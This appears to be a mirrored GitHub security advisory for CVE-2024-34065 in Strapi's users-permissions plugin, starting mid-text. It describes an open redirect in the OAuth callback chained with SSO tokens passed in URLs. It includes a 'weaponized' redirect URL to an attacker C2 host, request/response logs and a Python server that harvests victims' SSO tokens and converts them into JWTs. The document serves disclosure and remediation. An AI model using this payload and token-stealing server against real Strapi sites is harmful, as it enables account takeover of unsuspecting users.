};

module.exports = {
  async callback(ctx) {
    const provider = ctx.params.provider || 'local';
    const params = ctx.request.body;

    const store = strapi.store({ type: 'plugin', name: 'users-permissions' });
    const grantSettings = await store.get({ key: 'grant' });

    const grantProvider = provider === 'local' ? 'email' : provider;

    if (!_.get(grantSettings, [grantProvider, 'enabled'])) {
      throw new ApplicationError('This provider is disabled');
    }

    if (provider === 'local') {
      await validateCallbackBody(params);

      const { identifier } = params;

      // Check if the user exists.
      const user = await strapi.query('plugin::users-permissions.user').findOne({
        where: {
          provider,
          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],
        },
      });

      if (!user) {
        throw new ValidationError('Invalid identifier or password');
      }

      if (!user.password) {
        throw new ValidationError('Invalid identifier or password');
      }

      const validPassword = await getService('user').validatePassword(
        params.password,
        user.password
      );

      if (!validPassword) {
        throw new ValidationError('Invalid identifier or password');
      }

      const advancedSettings = await store.get({ key: 'advanced' });
      const requiresConfirmation = _.get(advancedSettings, 'email_confirmation');

      if (requiresConfirmation && user.confirmed !== true) {
        throw new ApplicationError('Your account email is not confirmed');
      }

      if (user.blocked === true) {
        throw new ApplicationError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    }

    // Connect the user with the third-party provider.
    try {
      const user = await getService('providers').connect(provider, ctx.query);

      if (user.blocked) {
        throw new ForbiddenError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    } catch (error) {
      throw new ApplicationError(error.message);
    }
  },

  //...

  async connect(ctx, next) {
    const grant = require('grant-koa');

    const providers = await strapi
      .store({ type: 'plugin', name: 'users-permissions', key: 'grant' })
      .get();

    const apiPrefix = strapi.config.get('api.rest.prefix');
    const grantConfig = {
      defaults: {
        prefix: `${apiPrefix}/connect`,
      },
      ...providers,
    };

    const [requestPath] = ctx.request.url.split('?');
    const provider = requestPath.split('/connect/')[1].split('/')[0];

    if (!_.get(grantConfig[provider], 'enabled')) {
      throw new ApplicationError('This provider is disabled');
    }

    if (!strapi.config.server.url.startsWith('http')) {
      strapi.log.warn(
        'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url'
      );
    }

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
  },

  //...

};

And more specifically:

...

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
...

Possible patch:

grantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback

_.get(ctx, 'query.callback') = $_GET["callback"] and _.get(ctx, 'session') = $_COOKIE["koa.sess"] (which is {"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}) so _.get(ctx, 'session.grant.dynamic.callback') = https://XXXXXXX/.

The route is clearly defined here:

File: packages/plugins/users-permissions/server/routes/content-api/auth.js

'use strict';

module.exports = [

//...

  {
    method: 'GET',
    path: '/auth/:provider/callback',
    handler: 'auth.callback',
    config: {
      prefix: '',
    },
  },

  //...

];

File: packages/plugins/users-permissions/server/services/providers-registry.js


const getInitialProviders = ({ purest }) => ({

//..

  async microsoft({ accessToken }) {
    const microsoft = purest({ provider: 'microsoft' });

    return microsoft
      .get('me')
      .auth(accessToken)
      .request()
      .then(({ body }) => ({
        username: body.userPrincipalName,
        email: body.userPrincipalName,
      }));
  },

//..

});

If parameter $_GET["callback"] is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie koa.sess:

koa.sess=eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9

Which once base64 decoded become {"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}.

The signature of the cookie is stored in cookie koa.sess.sig:

koa.sess.sig=wTRmcVRrn88hWMdg84VvSD87-_0

File: packages/plugins/users-permissions/server/bootstrap/grant-config.js


//..

  microsoft: {
    enabled: false,
    icon: 'windows',
    key: '',
    secret: '',
    callback: `${baseURL}/microsoft/callback`,
    scope: ['user.read'],
  },

//..

Vulnerability 2: Session token in URL

Description

Applications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Example 1: SSO token transmitted within URL (`$_GET["access_token"]`)

Path: /api/connect/microsoft
Parameter: $_GET["callback"]

When a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.

Weaponized payload:

https://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/

With a web server specially developed to exploit the vulnerability listening on \<C2>:8080, it is possible to retrieve a JWT token allowing authentication on Strapi.

A user is on his browser when he decides to click on a link sent to him by e-mail.

The attacker places the malicious link in the URL bar to simulate a victim's click.

The server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user's SSO token.

Everything is invisible to the victim.

Because the victim didn't change to another Web page.

The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.

Details

Get the JWT token with the `access_token`

First of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.

Request (HTTP):

GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV<REDACTED>yBzA HTTP/1.1
Host: <TARGET>

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Nov 2023 17:58:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 411
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"jwt":"eyJhbG<REDACTED>eCac","user":{"id":111,"username":"<REDACTED>@<REDACTED>-ext.com","email":"<redacted>@<redacted>-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}}

Request API routes using the JWT token

Then reuse the JWT token to request the API.

Request (HTTP):

GET /api/users/me/groups?app=support HTTP/1.1
Host: <TARGET>
Authorization: Bearer eyJ<REDACTED>EeCac

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Nov 2023 13:45:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24684
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1701179203
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,<REDACTED>

...

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

import base64
import json
import urllib.parse

from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv


# Strapi URL.
TARGET = "target.com"

# URLs to which victims are automatically redirected.
REDIRECT_URL = [
    "strapi.io",
    "www.google.fr"
]
# URL used to generate a valid JWT token for authentication within the
# application.
GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"


# This function is used to generate a curl command which once executed, will
# give us a valid JWT connection token.
def generate_curl_command(token):
    command = f"curl '{GEN_JWT_URL}?access_token={token}'"
    return command


# We create a custom HTTP server to retrieve users' SSO tokens.
class CustomServer(BaseHTTPRequestHandler):

    # Here we override the default logging function to reduce verbosity.
    def log_message(self, format, *args):
        pass

    # This function automatically redirects a user to the page defined in the
    # global variable linked to the redirection.
    def _set_response(self):
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL[0])
        self.end_headers()

    # If an SSO token is present, we parse it and log the result in STDOUT.
    def do_GET(self):
        # This condition checks whether a token is present in the URL.
        if str(self.path).find("access_token") != -1:
            # If this is the case, we recover the token.
            query = urllib.parse.urlparse(self.path).query
            query_components = dict(qc.split("=") for qc in query.split("&"))
            access_token = urllib.parse.unquote(query_components["access_token"])

            # In the token, which is a string in JWT format, we retrieve the
            # body part of the token.
            interesting_data = access_token.split(".")[1]

            # Patching base64 encoded data.
            interesting_data = interesting_data + "=" * (-len(interesting_data) % 4)

            # Parsing JSON.
            json_data = json.loads(base64.b64decode(interesting_data.encode()))
            family_name, given_name, ipaddr, upn = json_data["given_name"], json_data["family_name"], json_data["ipaddr"], json_data["upn"]

            print(f"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\n{access_token}\n")
            print(f"[*] Run: \"{generate_curl_command(query_components['access_token'])}\" to get JWT token")

        self._set_response()
        self.wfile.write("Redirecting ...".encode("utf-8"))


def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080):
    server_address = (ip, port)
    httpd = server_class(server_address, handler_class)

    print(f"Starting httpd ({ip}:{port}) ...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass

    httpd.server_close()
    print("Stopping httpd ...")


if __name__ == "__main__":
    if len(argv) == 3:
        run(ip=argv[1], port=int(argv[2]))
    else:
        run()

Severity ?

7.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/plugin-users-permissions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.24.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34065"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-294",
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-12T19:39:11Z",
    "nvd_published_at": "2024-06-12T15:15:51Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nBy combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).\n\n### Impact\n\nUnauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.\n\n### Technical details\n\n#### Vulnerability 1: Open Redirect\n\n##### Description\n\nOpen redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.\n\nIn the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.\n\n##### Remediation\n\nIf possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:\n\n- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.\n- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.\n\nIf it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:\n\n- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.\n- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend \u003cspan dir=\"\"\u003ehttp://yourdomainname.com\u003c/span\u003e to the URL before issuing the redirect.\n\n###### Example 1: Open Redirect in \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e via `$_GET[\"callback\"]`\n\n- Path: \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e\n- Parameter: `$_GET[\"callback\"]`\n\nPayload:\n\n```plaintext\nhttps://google.fr/\n```\n\nFinal payload:\n\n```plaintext\nhttps://\u003cTARGET\u003e/api/connect/microsoft?callback=https://google.fr/\n```\n\nUser clicks on the link:\n![c1](https://github.com/strapi/strapi/assets/30262080/c1944cf8-2ef0-4214-ba9e-d4aad10d85ba)\n\nLook at the intercepted request in Burp and see the redirect to Microsoft:\n\n![c0](https://github.com/strapi/strapi/assets/30262080/0c3d9289-432c-46ac-a7e3-eafe15f02483)\n\nMicrosoft check the cookies and redirects to the original domain (and route) but with different GET parameters.\n\nThen, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):\n\n![c2](https://github.com/strapi/strapi/assets/30262080/009e3898-1ccf-4ee4-9c29-496ff6b302d0)\n\nThe domain originally specified (https://google.fr) as `$_GET[\"callback\"]` parameter is present in the cookies. So \u003cspan dir=\"\"\u003e\\\u003cTARGET\\\u003e\u003c/span\u003e is using the cookies (`koa.sess`) to redirect.\n\n![c3](https://github.com/strapi/strapi/assets/30262080/4c25cb6c-c9e8-4c2d-aa61-1ad1442e5f4d)\n\n`koa.sess` cookie:\n\n```base64\neyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==\n```\n\n```json\n{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://google.fr/\"}},\"_expire\":1700234244263,\"_maxAge\":86400000}\n```\n\nThe vulnerability seems to come from the application\u0027s core:\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/controllers/auth.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/controllers/auth.js)\n\n```js\n\u0027use strict\u0027;\n\n/**\n * Auth.js controller\n *\n * @description: A set of functions called \"actions\" for managing `Auth`.\n */\n\n/* eslint-disable no-useless-escape */\nconst crypto = require(\u0027crypto\u0027);\nconst _ = require(\u0027lodash\u0027);\nconst { concat, compact, isArray } = require(\u0027lodash/fp\u0027);\nconst utils = require(\u0027@strapi/utils\u0027);\nconst {\n  contentTypes: { getNonWritableAttributes },\n} = require(\u0027@strapi/utils\u0027);\nconst { getService } = require(\u0027../utils\u0027);\nconst {\n  validateCallbackBody,\n  validateRegisterBody,\n  validateSendEmailConfirmationBody,\n  validateForgotPasswordBody,\n  validateResetPasswordBody,\n  validateEmailConfirmationBody,\n  validateChangePasswordBody,\n} = require(\u0027./validation/auth\u0027);\n\nconst { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;\nconst { ApplicationError, ValidationError, ForbiddenError } = utils.errors;\n\nconst sanitizeUser = (user, ctx) =\u003e {\n  const { auth } = ctx.state;\n  const userSchema = strapi.getModel(\u0027plugin::users-permissions.user\u0027);\n\n  return sanitize.contentAPI.output(user, userSchema, { auth });\n};\n\nmodule.exports = {\n  async callback(ctx) {\n    const provider = ctx.params.provider || \u0027local\u0027;\n    const params = ctx.request.body;\n\n    const store = strapi.store({ type: \u0027plugin\u0027, name: \u0027users-permissions\u0027 });\n    const grantSettings = await store.get({ key: \u0027grant\u0027 });\n\n    const grantProvider = provider === \u0027local\u0027 ? \u0027email\u0027 : provider;\n\n    if (!_.get(grantSettings, [grantProvider, \u0027enabled\u0027])) {\n      throw new ApplicationError(\u0027This provider is disabled\u0027);\n    }\n\n    if (provider === \u0027local\u0027) {\n      await validateCallbackBody(params);\n\n      const { identifier } = params;\n\n      // Check if the user exists.\n      const user = await strapi.query(\u0027plugin::users-permissions.user\u0027).findOne({\n        where: {\n          provider,\n          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],\n        },\n      });\n\n      if (!user) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      if (!user.password) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      const validPassword = await getService(\u0027user\u0027).validatePassword(\n        params.password,\n        user.password\n      );\n\n      if (!validPassword) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      const advancedSettings = await store.get({ key: \u0027advanced\u0027 });\n      const requiresConfirmation = _.get(advancedSettings, \u0027email_confirmation\u0027);\n\n      if (requiresConfirmation \u0026\u0026 user.confirmed !== true) {\n        throw new ApplicationError(\u0027Your account email is not confirmed\u0027);\n      }\n\n      if (user.blocked === true) {\n        throw new ApplicationError(\u0027Your account has been blocked by an administrator\u0027);\n      }\n\n      return ctx.send({\n        jwt: getService(\u0027jwt\u0027).issue({ id: user.id }),\n        user: await sanitizeUser(user, ctx),\n      });\n    }\n\n    // Connect the user with the third-party provider.\n    try {\n      const user = await getService(\u0027providers\u0027).connect(provider, ctx.query);\n\n      if (user.blocked) {\n        throw new ForbiddenError(\u0027Your account has been blocked by an administrator\u0027);\n      }\n\n      return ctx.send({\n        jwt: getService(\u0027jwt\u0027).issue({ id: user.id }),\n        user: await sanitizeUser(user, ctx),\n      });\n    } catch (error) {\n      throw new ApplicationError(error.message);\n    }\n  },\n\n  //...\n\n  async connect(ctx, next) {\n    const grant = require(\u0027grant-koa\u0027);\n\n    const providers = await strapi\n      .store({ type: \u0027plugin\u0027, name: \u0027users-permissions\u0027, key: \u0027grant\u0027 })\n      .get();\n\n    const apiPrefix = strapi.config.get(\u0027api.rest.prefix\u0027);\n    const grantConfig = {\n      defaults: {\n        prefix: `${apiPrefix}/connect`,\n      },\n      ...providers,\n    };\n\n    const [requestPath] = ctx.request.url.split(\u0027?\u0027);\n    const provider = requestPath.split(\u0027/connect/\u0027)[1].split(\u0027/\u0027)[0];\n\n    if (!_.get(grantConfig[provider], \u0027enabled\u0027)) {\n      throw new ApplicationError(\u0027This provider is disabled\u0027);\n    }\n\n    if (!strapi.config.server.url.startsWith(\u0027http\u0027)) {\n      strapi.log.warn(\n        \u0027You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url\u0027\n      );\n    }\n\n    // Ability to pass OAuth callback dynamically\n    grantConfig[provider].callback =\n      _.get(ctx, \u0027query.callback\u0027) ||\n      _.get(ctx, \u0027session.grant.dynamic.callback\u0027) ||\n      grantConfig[provider].callback;\n    grantConfig[provider].redirect_uri = getService(\u0027providers\u0027).buildRedirectUri(provider);\n\n    return grant(grantConfig)(ctx, next);\n  },\n\n  //...\n\n};\n```\n\nAnd more specifically:\n\n```js\n...\n\n    // Ability to pass OAuth callback dynamically\n    grantConfig[provider].callback =\n      _.get(ctx, \u0027query.callback\u0027) ||\n      _.get(ctx, \u0027session.grant.dynamic.callback\u0027) ||\n      grantConfig[provider].callback;\n    grantConfig[provider].redirect_uri = getService(\u0027providers\u0027).buildRedirectUri(provider);\n\n    return grant(grantConfig)(ctx, next);\n...\n```\n\nPossible patch:\n\n```js\ngrantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback\n```\n\n`_.get(ctx, \u0027query.callback\u0027)` = `$_GET[\"callback\"]` and `_.get(ctx, \u0027session\u0027)` = `$_COOKIE[\"koa.sess\"]` (which is `{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://XXXXXXX/\"}},\"_expire\":1701275652123,\"_maxAge\":86400000}`) so `_.get(ctx, \u0027session.grant.dynamic.callback\u0027)` = `https://XXXXXXX/`.\n\nThe route is clearly defined here:\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/routes/content-api/auth.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/routes/content-api/auth.js)\n\n```js\n\u0027use strict\u0027;\n\nmodule.exports = [\n\n//...\n\n  {\n    method: \u0027GET\u0027,\n    path: \u0027/auth/:provider/callback\u0027,\n    handler: \u0027auth.callback\u0027,\n    config: {\n      prefix: \u0027\u0027,\n    },\n  },\n\n  //...\n\n];\n```\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/services/providers-registry.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/services/providers-registry.js)\n\n```js\n\nconst getInitialProviders = ({ purest }) =\u003e ({\n\n//..\n\n  async microsoft({ accessToken }) {\n    const microsoft = purest({ provider: \u0027microsoft\u0027 });\n\n    return microsoft\n      .get(\u0027me\u0027)\n      .auth(accessToken)\n      .request()\n      .then(({ body }) =\u003e ({\n        username: body.userPrincipalName,\n        email: body.userPrincipalName,\n      }));\n  },\n\n//..\n\n});\n```\n\nIf parameter `$_GET[\"callback\"]` is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie `koa.sess`:\n\n`koa.sess`=`eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9`\n\nWhich once base64 decoded become `{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://\u003cTARGET\u003e/users/auth/redirect\"}},\"_expire\":1701275652123,\"_maxAge\":86400000}`.\n\nThe signature of the cookie is stored in cookie `koa.sess.sig`:\n\n`koa.sess.sig`=`wTRmcVRrn88hWMdg84VvSD87-_0`\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/bootstrap/grant-config.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/bootstrap/grant-config.js)\n\n```js\n\n//..\n\n  microsoft: {\n    enabled: false,\n    icon: \u0027windows\u0027,\n    key: \u0027\u0027,\n    secret: \u0027\u0027,\n    callback: `${baseURL}/microsoft/callback`,\n    scope: [\u0027user.read\u0027],\n  },\n\n//..\n```\n\n#### Vulnerability 2: Session token in URL\n\n##### Description\n\nApplications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.\n\n###### Example 1: SSO token transmitted within URL (`$_GET[\"access_token\"]`)\n\n- Path: \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e\n- Parameter: `$_GET[\"callback\"]`\n\nWhen a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.\n\nWeaponized payload:\n\n```plaintext\nhttps://\u003cTARGET\u003e/api/connect/microsoft?callback=http://\u003cC2\u003e:8080/\n```\n\nWith a web server specially developed to exploit the vulnerability listening on \u003cspan dir=\"\"\u003e\\\u003cC2\\\u003e:8080\u003c/span\u003e,  it is possible to retrieve a JWT token allowing authentication on Strapi.\n\nA user is on his browser when he decides to click on a link sent to him by e-mail.\n\n![c4](https://github.com/strapi/strapi/assets/30262080/c6e22fa1-14a4-4c76-a832-d07305f265b6)\n\n\u003e The attacker places the malicious link in the URL bar to simulate a victim\u0027s click.\n\n![c5](https://github.com/strapi/strapi/assets/30262080/4da28c5b-6501-4f93-9041-9917a2b070e6)\n\nThe server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user\u0027s SSO token.\n\n\u003e Everything is invisible to the victim.\n\n![c6](https://github.com/strapi/strapi/assets/30262080/58db0a31-3b3b-4648-958b-953eba88bf87)\n\nBecause the victim didn\u0027t change to another Web page.\n\n![c7](https://github.com/strapi/strapi/assets/30262080/ab4dd6f9-02e1-42c9-9142-434db865f0d3)\n\nThe attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.\n\n![c8](https://github.com/strapi/strapi/assets/30262080/aab8d22f-5f0e-4a67-85a8-2e333df9b84b)\n\n##### Details\n\n###### Get the JWT token with the `access_token`\n\nFirst of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.\n\nRequest (HTTP):\n\n```http\nGET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV\u003cREDACTED\u003eyBzA HTTP/1.1\nHost: \u003cTARGET\u003e\n\n```\n\nResponse (HTTP):\n\n```http\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 27 Nov 2023 17:58:46 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 411\nConnection: keep-alive\nContent-Security-Policy: connect-src \u0027self\u0027 https:;img-src \u0027self\u0027 data: blob: https://market-assets.strapi.io;media-src \u0027self\u0027 data: blob:;default-src \u0027self\u0027;base-uri \u0027self\u0027;font-src \u0027self\u0027 https: data:;form-action \u0027self\u0027;frame-ancestors \u0027self\u0027;object-src \u0027none\u0027;script-src \u0027self\u0027;script-src-attr \u0027none\u0027;style-src \u0027self\u0027 https: \u0027unsafe-inline\u0027\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-DNS-Prefetch-Control: off\nX-Download-Options: noopen\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nVary: Origin\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Powered-By: \u003cREDACTED\u003e\n\n{\"jwt\":\"eyJhbG\u003cREDACTED\u003eeCac\",\"user\":{\"id\":111,\"username\":\"\u003cREDACTED\u003e@\u003cREDACTED\u003e-ext.com\",\"email\":\"\u003credacted\u003e@\u003credacted\u003e-ext.com\",\"provider\":\"microsoft\",\"confirmed\":true,\"blocked\":false,\"createdAt\":\"2023-11-14T12:35:42.440Z\",\"updatedAt\":\"2023-11-16T21:00:19.241Z\",\"is_external\":false}}\n```\n\n###### Request API routes using the JWT token\n\nThen reuse the JWT token to request the API.\n\nRequest (HTTP):\n\n```http\nGET /api/users/me/groups?app=support HTTP/1.1\nHost: \u003cTARGET\u003e\nAuthorization: Bearer eyJ\u003cREDACTED\u003eEeCac\n\n```\n\nResponse (HTTP):\n\n```http\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 28 Nov 2023 13:45:42 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 24684\nConnection: keep-alive\nContent-Security-Policy: connect-src \u0027self\u0027 https:;img-src \u0027self\u0027 data: blob: https://market-assets.strapi.io;media-src \u0027self\u0027 data: blob:;default-src \u0027self\u0027;base-uri \u0027self\u0027;font-src \u0027self\u0027 https: data:;form-action \u0027self\u0027;frame-ancestors \u0027self\u0027;object-src \u0027none\u0027;script-src \u0027self\u0027;script-src-attr \u0027none\u0027;style-src \u0027self\u0027 https: \u0027unsafe-inline\u0027\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-DNS-Prefetch-Control: off\nX-Download-Options: noopen\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nVary: Origin\nX-RateLimit-Limit: 10\nX-RateLimit-Remaining: 9\nX-RateLimit-Reset: 1701179203\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Powered-By: \u003cREDACTED\u003e\n\n{\"apps\":{\"support\":{\"groups\":[{\"device_whitelist\":null,\"name\":\"test - support\",\"id\":10,\"group_privileges\":[{\"id\":37,\u003cREDACTED\u003e\n\n...\n```\n\n### POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)\n\n```python\nimport base64\nimport json\nimport urllib.parse\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom sys import argv\n\n\n# Strapi URL.\nTARGET = \"target.com\"\n\n# URLs to which victims are automatically redirected.\nREDIRECT_URL = [\n    \"strapi.io\",\n    \"www.google.fr\"\n]\n# URL used to generate a valid JWT token for authentication within the\n# application.\nGEN_JWT_URL = f\"https://{TARGET}/api/auth/microsoft/callback\"\n\n\n# This function is used to generate a curl command which once executed, will\n# give us a valid JWT connection token.\ndef generate_curl_command(token):\n    command = f\"curl \u0027{GEN_JWT_URL}?access_token={token}\u0027\"\n    return command\n\n\n# We create a custom HTTP server to retrieve users\u0027 SSO tokens.\nclass CustomServer(BaseHTTPRequestHandler):\n\n    # Here we override the default logging function to 